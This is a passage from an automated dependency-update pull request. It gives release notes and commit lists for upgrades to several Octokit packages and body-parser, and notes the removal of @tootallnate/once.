href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `body-parser` from 1.19.0 to 1.20.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.20.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThe reason for this release is a fix to the extended urlencoded parser returning objects instead of arrays for large array inputs (\u0026gt; 100) on qs@6.14.2+. (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/692\"\u003eexpressjs/body-parser#692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct off-by-one error in parameterCount by \u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps(qs): bump qs to 6.15.1 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/722\"\u003eexpressjs/body-parser#722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.5 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/721\"\u003eexpressjs/body-parser#721\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSpecial thanks to triager \u003ca href=\"https://github.com/krzysdz\"\u003e\u003ccode\u003e@​krzysdz\u003c/code\u003e\u003c/a\u003e for keeping this on our radar and effectively triaging the specific 